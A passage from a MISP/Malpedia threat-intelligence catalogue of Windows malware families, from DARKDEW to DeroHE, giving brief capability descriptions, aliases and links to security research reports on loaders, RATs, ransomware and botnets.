https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

DARKDEW

Mandiant associates this with UNC4191, this malware spreads to removable drives.

The tag is: misp-galaxy:malpedia="DARKDEW"

DARKDEW is also known as:

Table 3285. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/

DarkGate

First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.

The tag is: misp-galaxy:malpedia="DarkGate"

DarkGate is also known as:

  • Meh

  • MehCrypter

Table 3287. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

https://decoded.avast.io/janrubin/meh-2-2/

https://decoded.avast.io/janrubin/complex-obfuscation-meh/

https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/

https://embee-research.ghost.io/practical-signatures-for-identifying-malware-with-yara/

https://www.proofpoint.com/us/blog/threat-insight/battleroyal-darkgate-cluster-spreads-email-and-fake-browser-updates

https://blog.sekoia.io/darkgate-internals/

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

https://embee-research.ghost.io/decoding-a-simple-visual-basic-vbs-script-darkgate-loader/

https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams

https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors

https://www.esentire.com/blog/from-darkgate-to-danabot

https://github.security.telekom.com/2023/08/darkgate-loader.html

https://www.netskope.com/jp/blog/new-darkgate-variant-uses-a-new-loading-approach

https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/

https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/

https://www.trellix.com/about/newsroom/stories/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/

https://github.com/prodaft/malware-ioc/blob/master/PTI-66/DarkGate.md

https://x.com/embee_research/status/1736758775326146778

https://medium.com/@DCSO_CyTec/shortandmalicious-darkgate-d9102a457232

https://www.aon.com/cyber-solutions/aon_cyber_labs/darkgate-keylogger-analysis-masterofnone/

https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html

https://github.com/telekom-security/malware_analysis/blob/main/darkgate/extractor.py

DarkLoader

The tag is: misp-galaxy:malpedia="DarkLoader"

DarkLoader is also known as:

Table 3289. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader

https://twitter.com/3xp0rtblog/status/1459081435361517585

DarkMe

The tag is: misp-galaxy:malpedia="DarkMe"

DarkMe is also known as:

Table 3290. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme

http://blog.nsfocus.net/darkcasino-apt-evilnum/

DarkPink

The tag is: misp-galaxy:malpedia="DarkPink"

DarkPink is also known as:

Table 3293. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink

https://www.group-ib.com/media-center/press-releases/dark-pink-apt/

DarkPulsar

The tag is: misp-galaxy:malpedia="DarkPulsar"

DarkPulsar is also known as:

Table 3294. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar

https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/

DarkShell

DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.

The tag is: misp-galaxy:malpedia="DarkShell"

DarkShell is also known as:

Table 3296. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkshell-ddos-botnet-evolves-with-variants/

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf

DarkSide (Windows)

FireEye describes DARKSIDE as a ransomware written in C and configurable to target files whether on fixed, removable disks, or network shares. The malware can be customized by the affiliates to create a build for specific victims.

The tag is: misp-galaxy:malpedia="DarkSide (Windows)"

DarkSide (Windows) is also known as:

  • BlackMatter

Table 3297. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside

https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/

https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections

https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/

https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/

https://therecord.media/popular-hacking-forum-bans-ransomware-ads/

https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/

https://twitter.com/sysopfb/status/1422280887274639375

https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://www.mandiant.com/resources/burrowing-your-way-into-vpns

https://github.com/sisoma2/malware_analysis/tree/master/blackmatter

https://www.acronis.com/en-us/articles/darkside-ransomware/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://asec.ahnlab.com/en/34549/

https://www.secjuice.com/blue-team-detection-darkside-ransomware/

https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom

https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.glimps.fr/lockbit3-0/

https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6

https://brandefense.io/darkside-ransomware-analysis-report/

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime

https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://us-cert.cisa.gov/ncas/alerts/aa21-131a

https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/

https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/

https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/

https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html

https://www.databreaches.net/a-chat-with-darkside/

https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/

https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://community.riskiq.com/article/fdf74f23

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#

https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://zawadidone.nl/darkside-ransomware-analysis/

https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/

https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/

https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions

http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/

https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/

https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/

https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/

https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/

https://unit42.paloaltonetworks.com/darkside-ransomware/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/

https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://twitter.com/embee_research/status/1678631524374020098?s=46

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968

https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/

https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636

https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware

https://www.varonis.com/blog/darkside-ransomware/

https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside

https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/

https://threatpost.com/guess-fashion-data-loss-ransomware/167754/

https://www.ic3.gov/Media/News/2021/211101.pdf

https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/

https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/

https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf

https://blog.group-ib.com/blackmatter2

https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html

https://twitter.com/ValthekOn/status/1422385890467491841?s=20

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.youtube.com/watch?v=NIiEcOryLpI

https://twitter.com/GelosSnake/status/1451465959894667275

https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html

https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/

https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack

https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/

https://www.secureworks.com/research/threat-profiles/gold-waterfall

https://twitter.com/JAMESWT_MHT/status/1388301138437578757

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/

https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html

http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted

https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/

Darksky

DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.

The tag is: misp-galaxy:malpedia="Darksky"

Darksky is also known as:

Table 3298. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky

https://blog.radware.com/security/2018/02/darksky-botnet/

http://telegra.ph/Analiz-botneta-DarkSky-12-30

DarkTequila

Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.

The tag is: misp-galaxy:malpedia="DarkTequila"

DarkTequila is also known as:

Table 3300. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila

https://securelist.com/dark-tequila-anejo/87528/

DarkTortilla

DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.

From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.

The tag is: misp-galaxy:malpedia="DarkTortilla"

DarkTortilla is also known as:

Table 3301. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

https://www.secureworks.com/research/darktortilla-malware-analysis

Darktrack RAT

According to PCrisk, DarkTrack is a malicious program classified as a Remote Access Trojan (RAT). This type of malware enables remote access and control over an infected device. The level of control these programs have varies, however, some can allow user-level manipulation of the affected machine.

The functionalities of RATs likewise varies and so does the scope of potential misuse. DarkTrack has a broad range of functions/capabilities, which make this Trojan a highly-dangerous piece of software.

The tag is: misp-galaxy:malpedia="Darktrack RAT"

Darktrack RAT is also known as:

Table 3302. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat

https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html

https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1

http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml

https://www.facebook.com/darktrackrat/

DarkVNC

According to Enigmasoft, DarkVNC malware is a hacking tool that is available for purchase online. it is can be used as a Virtual Network Computing service, which means that the attackers can get full access to the targeted system via this malware. However, unlike a genuine Virtual Network Computing utility, the DarkVNC threat operates in the background silently. Therefore, it is highly likely that the victims may not notice that their systems have been compromised.

The tag is: misp-galaxy:malpedia="DarkVNC"

DarkVNC is also known as:

Table 3303. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc

https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884

https://isc.sans.edu/diary/rss/28934

https://reaqta.com/2017/11/short-journey-darkvnc/

DataExfiltrator

The tag is: misp-galaxy:malpedia="DataExfiltrator"

DataExfiltrator is also known as:

  • FileSender

Table 3305. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator

https://blog.reversinglabs.com/blog/data-exfiltrator

DBoxAgent

This malware uses DropBox as C&C channel.

The tag is: misp-galaxy:malpedia="DBoxAgent"

DBoxAgent is also known as:

Table 3309. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dboxagent

https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf

DcDcrypt

Ransomware written in .NET.

The tag is: misp-galaxy:malpedia="DcDcrypt"

DcDcrypt is also known as:

Table 3310. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dcdcrypt

https://labs.k7computing.com/index.php/dcdcrypt-ransomware-decryptor/

DCRat

DCRat is a typical RAT that has been around since at least June 2019.

The tag is: misp-galaxy:malpedia="DCRat"

DCRat is also known as:

  • DarkCrystal RAT

Table 3311. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://community.riskiq.com/article/50c77491

https://www.youtube.com/watch?v=ElqmQDySy48

https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://muha2xmad.github.io/malware-analysis/dcrat/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf

https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/

https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://embee-research.ghost.io/dcrat-manual-de-obfuscation/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/

https://cert.gov.ua/article/405538

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time

https://cert.gov.ua/article/160530

https://forensicitguy.github.io/snip3-crypter-dcrat-vbs/

https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains

DCSrv

A ransomware as used by MosesStaff, built around the DiskCryptor tool.

The tag is: misp-galaxy:malpedia="DCSrv"

DCSrv is also known as:

  • DCrSrv

Table 3312. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dcsrv

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

DDKeylogger

The tag is: misp-galaxy:malpedia="DDKeylogger"

DDKeylogger is also known as:

Table 3313. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

dearcry

According to PCrisk, DearCry ransomware has been observed infecting systems via ProxyLogon vulnerabilities of Microsoft Exchange servers - mail and calendaring servers developed by Microsoft. While a patch has been released addressing these vulnerabilities, thousands of Microsoft Exchange servers remained unpatched at the time of research.

The tag is: misp-galaxy:malpedia="dearcry"

dearcry is also known as:

  • DoejoCrypt

Table 3317. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry

https://www.youtube.com/watch?v=Hhx9Q2i7zGo

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b

https://www.youtube.com/watch?v=MRTdGUy1lfw

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf

https://www.youtube.com/watch?v=qmCjtigVVR0

https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s

DECAF

Ransomware written in Go.

The tag is: misp-galaxy:malpedia="DECAF"

DECAF is also known as:

Table 3319. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf

https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance

DeepRAT

The tag is: misp-galaxy:malpedia="DeepRAT"

DeepRAT is also known as:

Table 3322. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deep_rat

https://twitter.com/benkow_/status/1415797114794397701

Defray

Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.

The distribution of Defray has several notable characteristics: According to Proofpoint: " Defray is currently being spread via Microsoft Word document attachments in email The campaigns are as small as several messages each The lures are custom crafted to appeal to the intended set of potential victims The recipients are individuals or distribution lists, e.g., group@ and websupport@ Geographic targeting is in the UK and US Vertical targeting varies by campaign and is narrow and selective "

The tag is: misp-galaxy:malpedia="Defray"

Defray is also known as:

  • Glushkov

Table 3323. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.defray

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3

https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/

https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html

Deimos

Described by Elastic as being associated with win.jupyter, and being used in the context of initial access, persistence, and C&C capabilities.

The tag is: misp-galaxy:malpedia="Deimos"

Deimos is also known as:

Table 3324. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://www.elastic.co/blog/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant

DeimosC2

Trend Micro describes DeimosC2 as an open-source C&C framework that was released in June 2020. It is a fully-functional framework that allows for multiple attackers to access, create payloads for, and interact with victim computers. As a post-exploitation C&C framework, DeimosC2 will generate the payloads that need to be manually executed on computer servers that have been compromised through other means such as social engineering, exploitation, or brute-force attacks. Once it is deployed, the threat actors will gain the same access to the systems as the user account that the payload was executed as, either as an administrator or a regular user. Note that DeimosC2 does not perform active or privilege escalation of any kind.

The tag is: misp-galaxy:malpedia="DeimosC2"

DeimosC2 is also known as:

Table 3325. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos_c2

https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

https://censys.com/russian-ransomware-c2-network-discovered-in-censys-data/

DeliveryCheck

According to CERT-UA, this malware makes use of XSLT (Extensible Stylesheet Language Transformations) and COM-hijacking. Its specificity is the presence of a server part, which is usually installed on compromised MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DCS) PowerShell tool), effectively turning a legitimate server into a malware control center.

The tag is: misp-galaxy:malpedia="DeliveryCheck"

DeliveryCheck is also known as:

  • CAPIBAR

  • GAMEDAY

Table 3326. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.delivery_check

https://twitter.com/msftsecintel/status/1681695399084539908

https://cert.gov.ua/article/5213167

Delta(Alfa,Bravo, …​)

The tag is: misp-galaxy:malpedia="Delta(Alfa,Bravo, …​)"

Delta(Alfa,Bravo, …​) is also known as:

Table 3327. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas

DeltaStealer

Rust-based infostealer.

The tag is: misp-galaxy:malpedia="DeltaStealer"

DeltaStealer is also known as:

Table 3328. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer

https://www.trendmicro.com/en_us/research/23/e/rust-based-info-stealers-abuse-github-codespaces.html

Dented

Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.

The tag is: misp-galaxy:malpedia="Dented"

Dented is also known as:

Table 3329. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dented

Deprimon

According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.

DePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.

The tag is: misp-galaxy:malpedia="Deprimon"

Deprimon is also known as:

Table 3330. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon

https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/

DeriaLock

The tag is: misp-galaxy:malpedia="DeriaLock"

DeriaLock is also known as:

Table 3332. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock

https://twitter.com/struppigel/status/812601286088597505

DeroHE

DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application.

The tag is: misp-galaxy:malpedia="DeroHE"

DeroHE is also known as:

